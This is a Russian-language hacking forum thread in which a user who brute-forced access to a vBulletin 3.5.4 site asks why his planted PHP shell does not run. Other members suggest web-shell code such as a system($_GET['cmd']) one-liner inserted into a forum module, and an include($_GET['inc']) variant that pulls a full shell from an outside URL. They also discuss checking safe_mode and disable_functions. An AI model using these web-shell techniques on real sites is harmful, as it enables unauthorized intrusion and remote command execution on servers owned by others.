vBulletin 3.5.4 + shell

Discussion in 'Песочница' started by x_zStas_x, 24 Mar 2007.

  1. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Ни самописный шелл, ни вообще любой другой через модули (как написано в теме про уязвимости vBulletin) не работает. заходишь на faq.php?cmd=ls например, а там фигня полная. поиск и всё. через смайлы тоже не канает. :confused:
     
  2. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    отсюда вывод, оно пропатчено.....
     
  3. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    вот бл!!!! нах спрашивается я столько брутил??? :))
     
  4. И.Г.

    И.Г. Elder - Старейшина

    Joined:
    29 Aug 2006
    Messages:
    336
    Likes Received:
    343
    Reputations:
    111
    дело не в патче,а в неправильном использовании скрипта... если ты в модуль зафигачил шел,то он будет работать 100% (при условии что ты правльно даешь команду) в версии 3.5.4
     
    1 person likes this.
  5. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    может там винда стоит попробуй faq.php?cmd=dir
     
    2 people like this.
  6. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    не, там фряха! =)
    а использую правильно, че вы думаете я шелл не могу заюзать?? =)
    я ещё помню времена php-including =)
     
  7. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    лабо пропачено, либо ты что то не так сделал. еще раз все проверь.

    один раз было такое, что вот так не сработало faq.php?cmd=ls -al

    пришлось прямо в модуль вставлять код, попробуй. но при выполнении следующей команды надо переписывать модуль. ТАк что сразу заливай шелл.
     
  8. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    и так тоже не канает!
     
  9. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Дай каму-нить линку пусть попытается кто-нить!!!

    P.s.Кто же ентот счасливчик?:)
     
  10. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    неее :) я сам хочу :)
    как думаете если к вложениям добавить пхп, а потом куда-нить вложить шелл будет работать?? :)
     
  11. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    топикстатрет а ты вобще подумал о том что там может стоять сейфмод или в дисабле_функ зафигачено все ехечные функции?
     
  12. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    посмотри phpinfo();

    если отключены функции выполнении команд, то юзай php

    Например вывод всех файлов в каталоге:

     
  13. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    попробуй вместо
    PHP:
    <? system($_GET['cmd']) ?>
    вбить
    PHP:
    <? include($_GET['inc']) ?>
    и проинклудь нормальный шелл... faq.php?inc=http://site.ru/shell.php, где http://site.ru/shell.php - ссылка на твой шелл
     
  14. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    к сожелению вообще ничего не канает :'(
     
  15. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    safe_mod = off
     
  16. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    disable_functions system, shell_exec, exec, proc_get_status, proc_nice, proc_terminate, define_syslog_variables, syslog, openlog, closelog, escapeshellcmd, passthru, readfile, ocinumcols, ini_alter, leak, listen, chgrp, set_time_limit, apache_note, apache_setenv, debugger_on, debugger_off, ftp_exec, dl, dll, ftp
     
  17. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    что блин делать?) вам на растерзание отдать??:))
     
  18. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    PHP:
    <?  echo "31337";  ?>
    даже это не канает!!
     
  19. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Давай на растерзанье лутше...
     
  20. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    неее, что то тут не чисто!!:) надо разобраться!!:)